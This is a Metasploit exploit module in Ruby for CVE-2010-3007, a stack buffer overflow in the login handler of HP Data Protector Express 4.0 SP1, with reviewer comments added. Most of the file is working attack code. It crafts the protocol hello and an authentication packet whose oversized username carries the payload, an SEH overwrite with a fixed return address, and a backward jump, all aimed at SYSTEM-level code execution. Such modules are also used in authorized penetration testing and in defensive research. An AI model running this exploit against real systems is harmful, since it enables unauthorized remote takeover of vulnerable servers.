Path: blob/master/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2010-3007: a stack buffer overflow in the DtbClsLogin
# login handler of HP Data Protector Express 4.0 SP1 (dpwindtb.dll), reached over
# the dpwinsdr.exe service on TCP/3817. Mixes in Tcp for the socket handling and
# Seh for generate_seh_record; the single target is pinned to a specific build
# and OS (see 'Targets'). The vendor advisory is listed under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Data Protector DtbClsLogin Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The
        overflow occurs during the login process, in the DtbClsLogin function provided by
        the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an
        insecure way with the username. A successful exploitation will lead to code execution
        with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server
        Service) process, which runs as SYSTEM by default.
      },
      'Author'         =>
        [
          'AbdulAziz Hariri', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2010-3007' ],
          [ 'OSVDB', '67973' ],
          [ 'BID', '43105' ],
          [ 'ZDI', '10-174' ],
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]
        ],
      'Payload'        =>
        {
          # 'Space' equals the target 'Offset' below: the payload is padded up to it in exploit.
          'Space' => 712,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',
            {
              'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
              'Offset' => 712
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => '2010-09-09'
    ))
    register_options(
      [
        Opt::RPORT(3817),
      ])
  end

  # Service fingerprint only. Sends the protocol "hello" and looks for the
  # "Dtb: Context" marker in whatever the server answers within 10 seconds.
  # Returns CheckCode::Detected (service speaks the protocol) rather than
  # Vulnerable, since neither version nor patch level is verified here;
  # anything else, including no reply, is reported as Safe.
  def check
    connect

    # Random client machine name; inserted NUL-terminated into the hello below.
    machine_name = rand_text_alpha(15)

    print_status("#{sock.peerinfo} - Sending Hello Request")
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
    # NOTE(review): \xc0\xa8\x01\x86 reads as 192.168.1.134 - presumably a fixed
    # client address carried over from a capture; confirm the server ignores it.
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00"
    hello << machine_name << "\x00"
    # The trailing bytes spell "Dtb: Context\0" (\x44 ... \x74\x00) - the same
    # marker the response is matched against below.
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"

    sock.put(hello)
    hello_response = sock.get_once(-1, 10) # read whatever arrives, 10 s timeout
    disconnect # socket is closed before the response is evaluated

    if hello_response and hello_response =~ /Dtb: Context/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe

  end

  # Performs the same hello exchange as check, then sends one authentication
  # packet whose username field is the oversized buffer. Aborts with an error
  # if the hello gets no reply. The first 20 bytes of the packet are a fixed
  # header of little-endian 32-bit fields; the length field at byte offset 12
  # is back-filled once the whole packet has been assembled.
  def exploit

    connect

    # Random client machine name; inserted NUL-terminated into the hello below.
    machine_name = rand_text_alpha(15)

    print_status("#{sock.peerinfo} - Sending Hello Request")
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00"
    hello << machine_name << "\x00"
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"

    sock.put(hello)
    hello_response = sock.get_once(-1, 10) # read whatever arrives, 10 s timeout

    # Unlike check, an empty reply is also treated as failure here.
    if not hello_response or hello_response.empty?
      print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")
      # NOTE(review): returns without an explicit disconnect - confirm the
      # framework's cleanup closes sock on this path.
      return
    end

    # NOTE(review): the `<<` calls below append in place to the string returned
    # by payload.encoded; confirm that string is not reused elsewhere.
    bof = payload.encoded
    bof << rand_text(target['Offset']-bof.length) # pad up to the target offset
    bof << generate_seh_record(target.ret)
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string
    # The line below is used to trigger exception, don't go confused because of the big space,
    # there are only some available bytes until the end of the stack, it allows to assure exception
    # when there are mappings for dynamic memory after the stack, so to assure reliability it's better
    # to jump back.
    bof << rand_text(100000)

    header = [0x8451].pack("V") # packet id
    header << [0x32020202].pack("V") # svc id
    header << [0x00000018].pack("V") # cmd id
    header << [0].pack("V") # pkt length, calculated after pkt has been built
    header << "\x00\x00\x00\x00" # ?Unknown?

    # pkt_auth aliases header; the appends below extend the same string.
    pkt_auth = header
    pkt_auth << bof # username

    # Back-fill the 4-byte length field (header offset 12) with the final packet size.
    pkt_auth[12, 4] = [pkt_auth.length].pack("V")

    print_status("#{sock.peerinfo} - Sending Authentication Request")

    sock.put(pkt_auth)
    disconnect
  end
end